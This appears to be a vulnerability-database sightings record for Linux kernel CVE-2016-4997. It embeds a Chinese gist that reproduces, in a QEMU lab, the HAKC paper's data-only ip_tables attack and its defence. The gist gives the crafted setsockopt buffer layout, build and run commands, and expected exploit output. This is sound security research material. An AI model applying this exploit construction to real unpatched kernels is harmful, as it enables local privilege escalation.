{"vulnerability": "cve-2016-4997", "sightings": [{"uuid": "a4a7d61d-2844-4108-8222-ee49840a69f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "exploited", "source": "https://www.exploit-db.com/exploits/40435", "content": "", "creation_timestamp": "2016-09-27T00:00:00.000000Z"}, {"uuid": "1692f64c-2ddf-4f9b-8b68-a8b6fc0773d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:42.000000Z"}, {"uuid": "662ad1bc-e039-479e-a3fe-1fdd5d53d95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "https://gist.github.com/haohao-brian/ff61d9166cdb4ce5464346d7c94fdf55", "content": "# CVE-2016-4997 \u8ad6\u6587\u653b\u64ca\u624b\u6cd5 PoC \u8907\u73fe\u6307\u5357\n\n**\u8ad6\u6587**\uff1aPreventing Kernel Hacks with HAKC\uff08NDSS 2022\uff09 \n**\u5206\u652f**\uff1a`qing-paper-poc`\uff08\u4f4d\u65bc `/home/elice/HAKC/MTE-kernel`\uff09 \n**\u95dc\u9375\u6a94\u6848**\uff1a\n- `poc/CVE-2016-4997/poc_paper.c` \u2014 \u4f7f\u7528\u8005\u7a7a\u9593 PoC\n- `poc/CVE-2016-4997/paper_helper.c` \u2014 \u6838\u5fc3\u6a21\u7d44\uff08\u88ab\u653b\u64ca\u76ee\u6a19\uff09\n- `net/ipv4/netfilter/ip_tables.c` \u2014 \u542b CVE \u6f0f\u6d1e\u8207 HAKC \u9632\u8b77\n\n---\n\n## \u4e00\u3001\u4f9d\u64da\u8ad6\u6587\u64b0\u5beb PoC \u7684\u601d\u8def\n\n### \u8ad6\u6587\u5c0d CVE-2016-4997 \u7684\u63cf\u8ff0\uff08\u7b2c 1\u20132 \u9801\uff09\n\n\u8ad6\u6587 Listing 1 \u5c55\u793a\u7684\u662f\u4e00\u500b **data-only attack\uff08\u8cc7\u6599\u5c0e\u5411\u653b\u64ca\uff09**\uff1a\n\n```c\nstatic void compat_release_entry(struct compat_ipt_entry *e) {\n struct xt_entry_target *t;\n struct xt_entry_match *ematch;\n xt_ematch_foreach(ematch, e)\n module_put(ematch->u.kernel.match->me); // \u2190 \u653b\u64ca\u76ee\u6a19\n t = compat_ipt_get_target(e);\n module_put(t->u.kernel.target->me);\n}\n```\n\n\u653b\u64ca\u8005\u63d0\u4f9b\u4e00\u500b\u5c0f\u65bc `sizeof(compat_ipt_entry)=112` \u7684 `target_offset`\uff08\u4f8b\u5982 74\uff09\uff0c\u89f8\u767c\u4ee5\u4e0b\u9023\u9396\uff1a\n\n1. `check_compat_entry_size_and_hooks()` \u4e2d\uff0c`compat_ipt_get_target(e)` \u56de\u50b3 `e+74`\uff08ipt_ip \u6a19\u982d\u5167\u90e8\uff09\n2. `xt_request_find_target(\"\", 0)` \u627e\u5230\u6a19\u6e96 target\uff0c\u5c07 8 \u4f4d\u5143\u7d44 kernel \u6307\u6a19\u5beb\u5230 `e+82`\n3. \u6307\u6a19\u7684\u9ad8\u5169\u4f4d\u5143\u7d44\uff08`0xFF,0xFF`\uff09\u843d\u5728 `e+88/89`\uff0c\u5c07 `target_offset` \u8986\u5beb\u70ba `0xFFFF`\n4. \u7531\u65bc `num_entries=2` \u4f46\u53ea\u6709 1 \u7b46\u6709\u6548 entry\uff08`j=1 != 2`\uff09\uff0c\u9032\u5165 error cleanup \u8def\u5f91\n5. `compat_release_entry()` \u4ee5\u640d\u58de\u7684 `target_offset=0xFFFF` \u8fed\u4ee3\uff0c\u627e\u5230\u653b\u64ca\u8005\u690d\u5165\u7684\u5047 `xt_entry_match`\n6. `module_put(fake_match->me)` \u905e\u6e1b\u653b\u64ca\u8005\u6307\u5b9a\u7684 kernel \u6574\u6578\uff08\u6b64\u8655\u70ba `paper_fake_module->refcnt`\uff09\n\n### \u653b\u64ca\u7684\u95dc\u9375\u7279\u6027\n\n- **\u4e0d\u9055\u53cd\u8a18\u61b6\u9ad4\u5b89\u5168**\uff1a\u6240\u6709\u5b58\u53d6\u90fd\u5728\u5408\u6cd5\u7684\u5df2\u914d\u7f6e\u8a18\u61b6\u9ad4\u7bc4\u570d\u5167\n- **\u4e0d\u9055\u53cd CFI**\uff1a\u63a7\u5236\u6d41\u7a0b\u59cb\u7d42\u8d70\u5408\u6cd5\u8def\u5f91\n- **data-only**\uff1a\u53ea\u662f\u8b80\u5beb\u8cc7\u6599\uff0c\u4e0d\u57f7\u884c\u6ce8\u5165\u7a0b\u5f0f\u78bc\n- **\u4efb\u610f kernel \u6574\u6578\u905e\u6e1b**\uff1a\u653b\u64ca\u8005\u53ef\u8b93\u4efb\u610f kernel counter \u6e1b 1\uff08\u8ad6\u6587\u8209\u4f8b\u70ba UID\uff09\n\n### \u653b\u64ca\u6210\u529f\u7684\u6b63\u78ba\u9810\u671f\u7d50\u679c\uff1asetsockopt \u56de\u50b3 EINVAL\uff0c\u800c\u975e panic\n\n\u8ad6\u6587\u63cf\u8ff0\u7684\u653b\u64ca\u662f**\u5b8c\u5168\u975c\u9ed8\uff08silent\uff09\u7684**\u3002\u653b\u64ca\u6210\u529f\u6642 kernel \u4e0d\u6703 crash\uff0c\nsetsockopt \u5c0d\u547c\u53eb\u8005\u56de\u50b3 EINVAL\uff08`-1 / errno=22`\uff09\uff0c\u4f46\u6574\u6578\u5df2\u6084\u6084\u88ab\u905e\u6e1b\u3002\n\n\u9019\u4e26\u4e0d\u77db\u76fe\u2014\u2014EINVAL \u6b63\u662f exploit \u8def\u5f91\u7684\u523b\u610f\u8a2d\u8a08\uff1a\n\n```\n\u653b\u64ca\u8005\u69cb\u9020 num_entries=2\uff0c\u4f46\u53ea\u653e 1 \u7b46\u6709\u6548 entry\n\u2192 translate_compat_table: j=1 \u2260 num_entries=2\n\u2192 goto out_unlock \uff08error cleanup \u8def\u5f91\uff09\n\u2192 compat_release_entry() \u88ab\u547c\u53eb \u2190 \u6f0f\u6d1e\u89f8\u767c\u9ede\n\u2192 module_put(fake_match->me) \u2190 \u6574\u6578\u905e\u6e1b\n\u2192 translate_compat_table \u56de\u50b3 -EINVAL\n\u2192 setsockopt \u56de\u50b3 -1/EINVAL \u2190 \u653b\u64ca\u8005\u5b8c\u5168\u4e0d\u5728\u610f\u9019\u500b\u503c\n```\n\n\u653b\u64ca\u8005\u5728\u610f\u7684\u53ea\u6709**\u6838\u5fc3\u6574\u6578\u5df2\u88ab\u905e\u6e1b**\uff0csyscall \u7684\u932f\u8aa4\u56de\u50b3\u662f\u9810\u671f\u4e2d\u7684\u526f\u7522\u54c1\u3002\n\u9019\u4e5f\u6b63\u662f\u6b64 CVE \u5371\u96aa\u7684\u539f\u56e0\uff1a\u5b83\u4e0d\u89f8\u767c\u4efb\u4f55 crash \u6216 kernel warning\uff0c\n\u50b3\u7d71\u7684\u8a18\u61b6\u9ad4\u5b89\u5168\u9632\u8b77\uff08KASAN\uff09\u8207 CFI \u5b8c\u5168\u5075\u6e2c\u4e0d\u5230\uff0c\u53ea\u6709 HAKC \u7684\ncompartmentalization \u624d\u80fd\u5728\u5b58\u53d6\u767c\u751f\u524d\u4e88\u4ee5\u6514\u622a\u3002\n\n### PoC \u8a2d\u8a08\uff08`poc_paper.c`\uff09\n\n```\ncompat_ipt_replace header (96 bytes):\n name=\"filter\", num_entries=2, size=ENTRIES_SIZE, num_counters=1\n\nentry0 (\u5f9e buf+96 \u958b\u59cb):\n [ 0.. 83] ipt_ip = \u5168\u96f6\uff08\u901a\u904e ip_checkentry\uff09\n [ 88.. 89] target_offset = 74 \u2190 CVE \u89f8\u767c\u9ede\n [ 90.. 91] next_offset = 65535\uff08entry0 \u4f54\u6eff\u6574\u500b entries \u5340\u57df\uff09\n [112..127] \u5047 xt_entry_match\uff1a\n match_size = 65535 - 112 = 65423\n u.kernel.match = paper_fake_match \u7684 HAKC-format \u5730\u5740\n\nentry0 + 65535\uff08\u5047 xt_entry_target\uff09:\n u.kernel.target = paper_fake_match \u7684 HAKC-format \u5730\u5740\n \uff08\u9632\u6b62 target cleanup \u8def\u5f91\u767c\u751f NULL-deref crash\uff09\n```\n\n**\u8a2d\u8a08\u91cd\u9ede**\uff1a\n- `ENTRIES_SIZE = 65535 + 128 = 65663` \u800c\u975e 65535\uff0c\u4f7f `e+65535` \u843d\u5728 buffer \u5167\uff0c\u907f\u514d cleanup \u8d8a\u754c\u8b80 NULL \u5c0e\u81f4 crash\n- \u5047 xt_entry_match \u4f7f\u7528 `paper_fake_match` \u7684 HAKC-format \u5730\u5740\uff08\u898b\u4e0b\u7bc0\uff09\n\n---\n\n## \u4e8c\u3001\u74b0\u5883\u6e96\u5099\n\n### 2.1 QEMU \u8a2d\u5b9a\n\nQEMU \u5df2\u5728 `/home/elice/HAKC/MTE-kernel/poc/CVE-2016-4997/start-qemu.sh` \u5b9a\u7fa9\uff1a\n\n```bash\nqemu-system-aarch64 \\\n -machine virt,mte=on,gic-version=3,virtualization=on \\\n -m 4096 -cpu cortex-a710,pauth=on -smp 4 \\\n -kernel /home/elice/HAKC/MTE-kernel/arch/arm64/boot/Image \\\n -drive if=none,file=/home/elice/bullseye.img,id=vda,... \\\n -append '... nokaslr' \\\n -netdev user,...,hostfwd=tcp::2223-10.0.3.15:22 \\\n -fsdev local,...,path=/home/elice/HAKC/MTE-kernel/shared,...\n -device virtio-9p-pci,...,mount_tag=shared\n```\n\nSSH \u9023\u7dda\uff1a\n```bash\nssh -i /home/elice/bullseye.id_rsa -p 2223 root@localhost\n```\n\n\u82e5\u70ba rescue mode\uff0c\u9700\u5148\u900f\u904e serial socket \u5b8c\u6210\u7db2\u8def\u8a2d\u5b9a\uff1a\n```bash\nprintf '\\r\\n' | socat - UNIX-CONNECT:/tmp/hakc-elice-serial.sock\n# \u767b\u5165\u5f8c\nmkdir -p /run/sshd && /usr/sbin/sshd\nip link set enp0s2 up && dhclient enp0s2\n```\n\n### 2.2 Shared \u76ee\u9304\n\nQEMU \u7684 9p shared \u76ee\u9304\u5c0d\u61c9 `/home/elice/HAKC/MTE-kernel/shared/`\uff08VM \u5167\u639b\u8f09\u70ba `/shared`\uff09\u3002\n\n\u5728 VM \u5167\u639b\u8f09\uff1a\n```bash\nmount -t 9p -o trans=virtio shared /shared\n```\n\n---\n\n## \u4e09\u3001\u653b\u64ca\u8907\u73fe\uff08Counter \u5f9e 1000 \u905e\u6e1b\uff09\n\n### 3.1 \u5207\u63db\u5230\u653b\u64ca\u7248\u672c\n\n```bash\ngit -C /home/elice/HAKC checkout 6d3e37ffd\n# \u5373 \"qing-paper-poc: fix attack PoC \u2014 clean counter decrement, no crash\"\n```\n\n### 3.2 \u5efa\u7f6e ip_tables.ko \u8207 paper_helper.ko\n\n```bash\ncd /home/elice/HAKC/MTE-kernel\n\n# ip_tables.ko\uff08\u542b\u653b\u64ca\u7248 HAKC policy \u2014 access_tok \u5305\u542b GREEN_CLIQUE\uff09\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n -j$(nproc) M=net/ipv4/netfilter modules\n\n# paper_helper.ko\uff08vmalloc \u7248\uff0c\u542b GREEN MTE \u67d3\u8272\uff09\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n -j$(nproc) M=poc/CVE-2016-4997 modules\n\n# \u8907\u88fd\u5230 shared \u76ee\u9304\ncp net/ipv4/netfilter/ip_tables.ko shared/\ncp poc/CVE-2016-4997/paper_helper.ko shared/\n```\n\n### 3.3 \u5efa\u7f6e poc_paper\uff08\u4f7f\u7528\u8005\u7a7a\u9593 PoC\uff09\n\n```bash\naarch64-linux-gnu-gcc -O2 -static -o shared/poc_paper \\\n poc/CVE-2016-4997/poc_paper.c\n```\n\n### 3.4 \u66ff\u63db VM \u78c1\u789f\u4e0a\u7684 ip_tables.ko\n\n\u7531\u65bc ip_tables \u5728 VM \u958b\u6a5f\u6642\u81ea\u52d5\u8f09\u5165\uff0c\u9700\u66ff\u63db\u78c1\u789f\u4e0a\u7684\u6a21\u7d44\uff1a\n\n```bash\n# \u5728 VM \u5167\uff08\u900f\u904e SSH \u6216 serial\uff09\ncp /shared/ip_tables.ko /lib/modules/5.10.24/kernel/net/ipv4/netfilter/ip_tables.ko\necho b > /proc/sysrq-trigger # \u91cd\u958b\u6a5f\n```\n\n\u91cd\u958b\u6a5f\u5f8c\uff08\u9032\u5165 rescue prompt \u5f8c\u6309 Enter\uff09\uff0c\u8f09\u5165 paper_helper\uff1a\n\n```bash\n# \u5728 VM \u5167\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\n```\n\n### 3.5 \u57f7\u884c\u653b\u64ca\n\n```bash\n# \u5728 VM \u5167\n/shared/poc_paper\n```\n\n**\u9810\u671f\u8f38\u51fa**\uff1a\n```\n[*] paper_fake_match kernel address : 0x05ff800011b19000\n[*] counter before attack : 1000\n[*] Calling setsockopt(IPPROTO_IP, cmd=66) ...\n[*] entry0: target_offset=74 next_offset=65535 num_entries=2\n[*] fake match at entries+112 u.kernel.match=0x05ff800011b19000\n[*] fake target at entries+65535 u.kernel.target=0x05ff800011b19000\n[*] setsockopt returned -1 (errno=22: Invalid argument)\n[*] counter after attack : 998\n\n[+] ATTACK SUCCEEDED\n counter: 1000 \u2192 998 (decremented 2 time(s))\n Both match and target cleanup paths called\n module_put(paper_fake_match->me) \u2014 no HAKC block.\n```\n\n### 3.6 \u7d50\u679c\u5206\u6790\n\n- **counter 1000\u2192998**\uff1a`compat_release_entry` \u6210\u529f\u547c\u53eb\u4e86 `module_put(paper_fake_match->me)` \u5169\u6b21\uff08match \u8def\u5f91 + target cleanup \u8def\u5f91\u5404\u4e00\u6b21\uff09\n- **setsockopt \u56de\u50b3 EINVAL**\uff1a\u9019\u662f\u6b63\u5e38\u7684\uff08`translate_compat_table` \u56de\u50b3 `-EINVAL` \u56e0\u70ba `j=1 \u2260 num_entries=2`\uff09\uff1b\u653b\u64ca\u5728 cleanup \u8def\u5f91\u4e2d\u767c\u751f\n- **kernel \u6c92\u6709 crash**\uff1a\u9019\u6b63\u662f data-only attack \u7684\u95dc\u9375\u7279\u6027\u2014\u2014\u6240\u6709\u8a18\u61b6\u9ad4\u5b58\u53d6\u90fd\u5408\u6cd5\n\n---\n\n## \u56db\u3001HAKC MTE Color \u9632\u5b88\u6a5f\u5236\n\n### 4.1 \u9632\u5b88\u601d\u8def\n\n\u8ad6\u6587\u7684\u6838\u5fc3\u4e3b\u5f35\uff1a\u82e5\u5c07 packet filtering \u529f\u80fd\u9694\u96e2\u5230\u7368\u7acb\u7684 HAKC \u9694\u9593\uff08compartment\uff09\uff0c\u5247 ip_tables \u53ea\u80fd\u5b58\u53d6\u5c6c\u65bc\u81ea\u5df1\u9694\u9593\u7684\u8a18\u61b6\u9ad4\uff0c\u7121\u6cd5\u5b58\u53d6 paper_helper\uff08\u4e0d\u540c\u9694\u9593\uff09\u7684\u7269\u4ef6\u3002\n\n\u5be6\u4f5c\u4e0a `check_hakc_data_access(address, access_tok)` \u57f7\u884c\uff1a\n\n```\n1. addr_claque = upper_bit_claque(address) = bits[63:56]\n2. addr_color = mte_get_mem_tag(canonical(address)) // MTE allocation tag\n3. obtain_cert = create_pac_context(addr_claque, HAKC_MASK_COLOR(addr_color))\n4. salt = obtain_cert & access_tok\n5. if VALID_CLAQUE(addr_claque) && !salt: BUG() // \u8de8\u9694\u9593\u5b58\u53d6\n```\n\n### 4.2 \u95dc\u9375\u554f\u984c\u8207\u89e3\u6cd5\n\n#### \u554f\u984c\u4e00\uff1araw kernel \u5730\u5740\u8b93 VALID_CLAQUE \u5931\u6548\n\n\u539f\u59cb kernel \u5730\u5740\uff08`0xffff...`\uff09\u7684 bits[63:56] = `0xFF = 255`\uff0c\u4f46\uff1a\n```\nVALID_CLAQUE(255) = (255 > 0) && (255 < 255) = false\n```\n\u2192 BUG() \u689d\u4ef6 `VALID_CLAQUE && !salt` \u6c38\u9060\u4e0d\u6210\u7acb\u3002\n\n**\u89e3\u6cd5**\uff1a`paper_helper` \u900f\u904e `/proc/paper_helper` \u66b4\u9732 **HAKC-format \u5730\u5740**\uff0c\u628a bits[63:56] \u8a2d\u70ba claque_id=5\uff08\u800c\u975e 0xFF\uff09\uff1a\n\n```c\nunsigned long hakc_addr = (raw & ~CLAQUE_BIT_MASK_2) |\n ((unsigned long)5 << CLAQUE_START_2);\n// raw = 0xffff800011b19000 \u2192 hakc_addr = 0x05ff800011b19000\n```\n\n\u73fe\u5728 `upper_bit_claque(0x05ff...) = 5`\uff0c`VALID_CLAQUE(5) = true`\u3002\n\n#### \u554f\u984c\u4e8c\uff1aMTE tag \u7121\u6cd5\u8a2d\u5728 module BSS \u8a18\u61b6\u9ad4\n\nModule BSS/data \u9801\u9762\u4f7f\u7528 `MT_NORMAL`\uff08\u975e `MT_NORMAL_TAGGED`\uff09\uff0c\u800c\u4e14 `mte_get_mem_tag()` \u4e2d\u6709\u8edf\u9ad4 guard\uff1a\n\n```c\nif (!virt_addr_valid(canon) && !is_vmalloc_addr(canon))\n return 0xf0; // SILVER_CLIQUE \u2014 \u63d0\u524d\u8fd4\u56de\uff0c\u4e0d\u57f7\u884c ldg\n```\n\nModule \u5730\u5740\u4e0d\u5728 linear map \u4e5f\u4e0d\u5728 vmalloc \u7a7a\u9593 \u2192 \u76f4\u63a5\u8fd4\u56de SILVER\u3002\n\n**\u89e3\u6cd5**\uff1a\u7528 `vzalloc()` \u5206\u914d `paper_fake_match`\uff0cvmalloc \u5730\u5740\u901a\u904e `is_vmalloc_addr()` \u6aa2\u67e5\uff0c\u8b93 `ldg` \u6307\u4ee4\u78ba\u5be6\u57f7\u884c\u3002\u518d\u547c\u53eb `hakc_color_address()` \u8a2d\u7f6e GREEN MTE tag\uff1a\n\n```c\npaper_fake_match = vzalloc(sizeof(struct xt_match));\nhakc_color_address(paper_fake_match, GREEN_CLIQUE, sizeof(struct xt_match));\n```\n\n#### \u554f\u984c\u4e09\uff1aip_tables access_tok \u5305\u542b GREEN_CLIQUE\n\n\u539f\u59cb\u8a2d\u8a08\u8b93 ip_tables \u80fd\u5b58\u53d6 GREEN_CLIQUE\uff08\u70ba\u4e86\u907f\u514d\u8aa4\u64cb\u5408\u6cd5\u6307\u6a19\uff09\uff0c\u5c0e\u81f4\u653b\u64ca\u4e0d\u88ab\u963b\u64cb\u3002\n\n**\u89e3\u6cd5**\uff1a\u79fb\u9664 GREEN_CLIQUE\uff1a\n\n```c\n// \u653b\u64ca\u7248\uff08\u4e0d\u9632\u5b88\uff09\uff1a\nHAKC_MODULE_CLAQUE(2, RED_CLIQUE,\n HAKC_MASK_COLOR(SILVER_CLIQUE) | HAKC_MASK_COLOR(GREEN_CLIQUE));\n\n// \u9632\u5b88\u7248\uff1a\nHAKC_MODULE_CLAQUE(2, RED_CLIQUE,\n HAKC_MASK_COLOR(SILVER_CLIQUE));\n```\n\n### 4.3 \u9632\u5b88\u6578\u5b78\u9a57\u8b49\n\n```\npaper_fake_match \u5c6c\u6027\uff1a\n claque = 5\uff08bits[63:56] = 0x05\uff09\n color = GREEN_CLIQUE\uff08MTE tag = 0xF1\uff09\n\ncheck_hakc_access() \u8a08\u7b97\uff1a\n addr_claque = 5\n VALID_CLAQUE(5) = (5>0 && 5<255) = true \u2713\n addr_color = GREEN_CLIQUE (0xF1)\n obtain_cert = (5 << 16) | HAKC_MASK_COLOR(GREEN)\n = (5 << 16) | 2 = 0x00050002\n access_tok = HAKC_CONTEXT(2, SILVER_MASK)\n = (2 << 16) | 1 = 0x00020001\n salt = 0x00050002 & 0x00020001 = 0x00000000\n\n VALID_CLAQUE(5) && !salt \u2192 BUG() \u2192 \u653b\u64ca\u88ab\u963b\u64cb\n```\n\n### 4.4 \u4fee\u6539\u6458\u8981\n\n| \u6a94\u6848 | \u4fee\u6539\u5167\u5bb9 |\n|------|---------|\n| `poc/CVE-2016-4997/paper_helper.c` | `paper_fake_match` \u6539\u7528 `vzalloc()`\uff1b\u986f\u5f0f\u547c\u53eb `hakc_color_address(..., GREEN_CLIQUE, ...)`\uff1b`/proc/paper_helper` \u8f38\u51fa HAKC-format \u5730\u5740\uff08bits[63:56]=5\uff09 |\n| `net/ipv4/netfilter/ip_tables.c` | `HAKC_MODULE_CLAQUE` \u79fb\u9664 `HAKC_MASK_COLOR(GREEN_CLIQUE)` |\n\n---\n\n## \u4e94\u3001\u9632\u5b88\u8907\u73fe\uff08HAKC \u963b\u64cb\u653b\u64ca\uff09\n\n### 5.1 \u5207\u63db\u5230\u9632\u5b88\u7248\u672c\n\n```bash\ngit -C /home/elice/HAKC checkout b82d492ec\n# \u5373 \"qing-paper-poc: HAKC defense \u2014 restrict ip_tables access_tok to SILVER only\"\n```\n\n### 5.2 \u5efa\u7f6e\u9632\u5b88\u7248 ip_tables.ko\n\n```bash\ncd /home/elice/HAKC/MTE-kernel\nmake CC=clang ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- \\\n -j$(nproc) M=net/ipv4/netfilter modules\ncp net/ipv4/netfilter/ip_tables.ko shared/\n```\n\n### 5.3 \u5728 VM \u4e2d\u66ff\u63db\u6a21\u7d44\u4e26\u91cd\u958b\u6a5f\n\n```bash\n# \u5728 VM \u5167\ncp /shared/ip_tables.ko /lib/modules/5.10.24/kernel/net/ipv4/netfilter/ip_tables.ko\necho b > /proc/sysrq-trigger\n```\n\n### 5.4 \u91cd\u958b\u6a5f\u5f8c\u8f09\u5165 paper_helper\n\n```bash\n# \u5728 VM \u5167\uff08rescue prompt \u6309 Enter \u767b\u5165\u5f8c\uff09\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\ncat /proc/paper_helper # \u78ba\u8a8d COUNTER=1000\n```\n\n### 5.5 \u57f7\u884c\u9632\u5b88\u6e2c\u8a66\n\n```bash\n# \u5728 VM \u5167\n/shared/poc_paper\n```\n\n**\u9810\u671f\u884c\u70ba**\uff1aSSH \u9023\u7dda\u4e2d\u65b7\uff08kernel BUG() panic\uff09\uff0c`poc_paper` \u7684\u8f38\u51fa\u4e0d\u6703\u5370\u51fa\u3002\n\n### 5.6 \u78ba\u8a8d\u9632\u5b88\u6548\u679c\n\n\u91cd\u958b\u6a5f\u5f8c\uff08rescue prompt \u6309 Enter\uff09\uff0c\u91cd\u65b0\u639b\u8f09\u4e26\u6aa2\u67e5\uff1a\n\n```bash\nmount -t 9p -o trans=virtio shared /shared\ninsmod /shared/paper_helper.ko\ncat /proc/paper_helper\n```\n\n**\u9810\u671f\u8f38\u51fa**\uff1a\n```\nFAKE_MATCH_KADDR=05ff800011b19000\nCOUNTER=1000\n```\n\nCounter **\u7dad\u6301 1000**\uff0c\u4ee3\u8868 `module_put` \u5f9e\u672a\u88ab\u57f7\u884c\uff0c\u653b\u64ca\u88ab\u5b8c\u5168\u963b\u64cb\u3002\n\n### 5.7 dmesg \u5206\u6790\n\n```bash\ndmesg | grep -A 5 \"HAKC ENFORCE\"\n```\n\n**\u9810\u671f dmesg**\uff1a\n```\nHAKC ENFORCE DENY (color mismatch):\n address=05ff800011b19000 color=GREEN_CLIQUE claque=5\n access_tok=0000000000020001 (caller: check_hakc_data_access+0x88/0xa0)\n------------[ cut here ]------------\nkernel BUG at arch/arm64/kernel/hakc/hakc.c:535!\nInternal error: Oops - BUG: 0 [#1] PREEMPT SMP\n...\npc : check_hakc_access+0x124/0x128\n```\n\n---\n\n## \u516d\u3001\u5169\u968e\u6bb5 Commit \u8aaa\u660e\n\n| Commit | Hash | \u8aaa\u660e |\n|--------|------|------|\n| \u653b\u64ca\u7248 | `6d3e37ffd` | ip_tables access_tok \u542b GREEN \u2192 \u653b\u64ca\u6210\u529f\uff0ccounter \u905e\u6e1b |\n| \u9632\u5b88\u7248 | `b82d492ec` | ip_tables access_tok \u50c5\u542b SILVER \u2192 BUG() \u89f8\u767c\uff0ccounter \u4e0d\u8b8a |\n\n\u5169\u500b\u7248\u672c\u7684\u5dee\u7570\u53ea\u6709 `ip_tables.c` \u7684\u4e00\u884c\uff1a\n```diff\n-HAKC_MODULE_CLAQUE(2, RED_CLIQUE, HAKC_MASK_COLOR(SILVER_CLIQUE) | HAKC_MASK_COLOR(GREEN_CLIQUE));\n+HAKC_MODULE_CLAQUE(2, RED_CLIQUE, HAKC_MASK_COLOR(SILVER_CLIQUE));\n```\n\n`paper_helper.c` \u8207 `poc_paper.c` \u5728\u5169\u500b\u7248\u672c\u4e2d\u5b8c\u5168\u76f8\u540c\u2014\u2014\u5dee\u7570\u7d14\u7cb9\u5728\u65bc **ip_tables \u7684\u9694\u9593\u5b58\u53d6\u653f\u7b56**\u3002\n", "creation_timestamp": "2026-06-04T01:11:13.000000Z"}, {"uuid": "07a0aaad-bb61-48e3-8d35-0576ca810a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:09:48.000000Z"}, {"uuid": "ec485950-1d81-412b-bfe6-15bc29ec7909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-4997", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}]}